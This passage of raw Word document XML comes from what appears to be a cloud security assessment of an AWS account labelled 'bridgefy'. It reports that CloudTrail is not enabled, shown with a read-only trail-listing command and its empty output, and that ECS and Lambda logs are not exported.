            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>cli/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>153</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="62"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId231">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</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spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(bridgefy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CloudTrail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reveals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>there</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>trails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>regions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for r in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"us-east-1" "us-east-2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>; do aws cloudtrail list-trails --region $r; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Trails"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: [] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Trails"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: [] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="161"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ECS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lambda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exported</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ECS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>well</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Lambda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>groups.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Even though all logs are preserved (since a retention policy for logs is not set), there are no export tasks. Archiving logs to an external location is important, as it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>prevents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attackers from covering their tracks by deleting all logs in the compromised account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reviewing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tasks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>identify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>collected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="1440" w:right="391"/>
      </w:pPr>
      <w:hyperlink r:id="rId232">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/cloudwatch/home?region=us-east-1#l</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId232">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>ogsV2:log-groups</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
